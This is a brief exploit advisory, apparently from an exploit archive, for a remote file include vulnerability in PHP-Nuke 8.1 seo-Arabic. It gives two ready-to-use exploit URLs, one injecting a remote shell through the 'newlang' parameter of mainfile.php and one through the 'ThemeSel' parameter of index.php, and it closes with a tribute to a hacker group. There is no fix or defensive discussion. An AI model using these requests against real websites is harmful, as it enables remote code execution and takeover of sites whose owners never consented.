id: 13683
date: 08/12/2010
title: PHP-Nuke-8.1-seo-Arabic Remote File Include Vulnerabilty
author: LoSt.HaCkEr
cves: 

========================================================
PHP-Nuke-8.1-seo-Arabic Remote File Include Vulnerabilty
========================================================

# Exploit Title: [PHP-Nuke-8.1-seo-Arabic Remote File Include ] 
# Date: [12-8-2010] # Author: LoSt.HaCkEr 
# Software Link: [http://scripts.bdr130.net/faile/PHP-Nuke-8.1-seo-Arabic.zip] # Version: [v 8.1] # Tested on: [Windows XP] 
# CVE : [??? ??????]
#Contact: LoSt.HaCkEr[at]yahoo[dot]com____________________________________
 
Exploit: http://target/PHP-Nuke-8.1-seo-Arabic/PHP-Nuke-8.1-seo-Arabic/html/mainfile.php?newlang=[shell]____________________________________________
 
Exploit: http://target/PHP-Nuke-8.1-seo-Arabic/PHP-Nuke-8.1-seo-Arabic/html/index.php?ThemeSel=[shell]____________________________________________
 
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers



#  0day.today [2023-03-22]  #